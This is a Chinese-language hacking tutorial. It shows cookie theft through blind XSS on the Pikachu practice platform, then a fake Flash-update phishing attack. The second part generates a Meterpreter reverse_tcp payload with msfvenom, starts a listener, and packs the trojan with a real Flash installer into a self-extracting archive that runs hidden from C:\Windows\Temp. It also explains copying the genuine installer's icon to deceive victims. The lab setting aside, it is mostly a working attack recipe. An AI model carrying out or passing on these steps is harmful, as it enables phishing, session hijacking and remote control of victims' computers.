1.XSS-窃取Cookie 网站注册账号并登陆
2.查看配置代码
3.打开一个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输入进去
4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码
5.回到平台上可看到其劫持的Cookie信息.
xss flash钓鱼拿到主机控制权
1.本机phpstudy中开启web服务
2.下载项目并将其源码文件部署在网站根目录下修改并访问
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash
3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面
4.进一步对提供下载的Flash文件进行伪装...在真的Flash官网下载安装程序并使用MSF生成一个木马
# Flash官网下载
https://www.flash.cn/download-wins
# MSF生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=虚拟机ip LPORT=44
44 -f exe > shell.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run
kali中运行代码下载shell.exe 拖到本机
5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填
写解压路径为C:\Windows\Temp
C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件
6.管理员进入后自动跳转
7.kali运行 模拟受害者的流程 最终获取到受害者网站控制权
ps:为了更好的迷惑可以使用 ResourceHacker修改图标,下载安装;通过ResourceHacker打开原版的flash安
装程序,点击Icon Group文件夹中的文件,鼠标右键"保存*.ico资源",即可导出ico图标
# 下载地址
https://www.onlinedown.net/soft/12420.htm